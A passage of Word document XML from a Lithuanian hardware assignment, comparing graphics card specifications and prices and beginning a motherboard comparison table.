          <w:p w14:paraId="799947D6" w14:textId="6AB041D5" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2x DisplayPort</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="444392DB" w14:textId="69EE099E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1x USB Type-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="17242639" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="22B0997C" w14:textId="63521ECC" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Galio lygis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2C0076BD" w14:textId="348DCA0D" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>260W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="66C45564" w14:textId="1B1CE440" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>300 W</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4D6A5482" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="72B7CBCC" w14:textId="168D7E81" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Papildomi maitinimo lizdai </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="081C87E8" w14:textId="3F011532" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8 pin + 8 pin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3509FE1E" w14:textId="7C6B305D" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8 pin + 8 pin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="29CA96E7" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="36DD59E3" w14:textId="21A8F5D4" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Išleidimo metai į rinką</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="376B5637" w14:textId="44B4E34A" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Q3'18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="61BAB1AA" w14:textId="6120237A" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Q4'20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0EFF47D5" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="219169B0" w14:textId="154A5DD7" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Našumo rodiklis passmark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="78449BD0" w14:textId="35EAF25D" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>21581</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FCFD943" w14:textId="553EED58" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>25107</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="564132E3" w:rsidRPr="005A5C28" w14:paraId="13569E69" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6770431E" w14:textId="4BDD5BB8" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Rekomenduojama kaina</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58CC7D4C" w14:textId="6497A187" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$999</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7ECCBFCB" w14:textId="4786F99A" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$649</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32C0BFE5" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26592444" w14:textId="2E7BF95B" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Išvados.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pagal našumo</w:t>
      </w:r>
      <w:r w:rsidR="7B901B9C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,,Passmark”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> rodiklį pirmauja vaizdo plokštė AMD Radeon RX 6800 XT</w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i yra pig</w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>snė</w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nei likusios dvi</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Atitinkamai pagal našumo ir kainos santykį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>prioritetinė</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> GeForce RTX 2080 Ti</w:t>
      </w:r>
      <w:r w:rsidR="5347F9F5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Founders Edition.</w:t>
      </w:r>
      <w:r w:rsidR="5F3ADE2A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">GeForce RTX 2080 Ti Founders Edition </w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">geresnė </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tik pagal tokius parametrus kaip </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>atminties magistralę</w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">352 bitų </w:t>
      </w:r>
      <w:r w:rsidR="131B7568" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 256 bitų</w:t>
      </w:r>
      <w:r w:rsidR="6C3774AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pagal atminties pralaidumą 616GB/s </w:t>
      </w:r>
      <w:r w:rsidR="4A3FCC55" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 512.0 GB/s, taip pagal RT branduolių skaičių 78 </w:t>
      </w:r>
      <w:r w:rsidR="676981CD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 72. </w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>agal našumo ir kainos santykį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">prioritetinė </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>yra AMD vaizdo plokštė.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1426CC6E" w14:textId="2BBBA7FE" w:rsidR="0064789D" w:rsidRPr="005A5C28" w:rsidRDefault="0064789D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C04C371" w14:textId="77777777" w:rsidR="00ED6F79" w:rsidRPr="005A5C28" w:rsidRDefault="00ED6F79" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUDARYTI IR UŽPILDYTI LENTELĘ BEI PALYGINTI KELIŲ FORMOS FAKTORIŲ PAGRINDINES PLOKŠTES.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E6410" w14:textId="2532C020" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="005F39ED" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LA</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>KIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E7ACE8" w14:textId="32EB1C55" w:rsidR="10C2F772" w:rsidRPr="005A5C28" w:rsidRDefault="10C2F772" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>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4"/>
        <w:gridCol w:w="3306"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7CDC1BB8" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1B7A0F7B" w14:textId="74DDBBB7" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pagrindinės plokštės modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E5C43E6" w14:textId="26C8E912" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gigabyte X570 AORUS ULTRA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="390082AE" w14:textId="37950BD3" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="5CBB6EB7" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Asus TUF GAMING B550M-PLUS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="43DD3A6D" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="253CF5D3" w14:textId="1722CD03" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Lustas (chipset)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="747037A5" w14:textId="3792F03E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
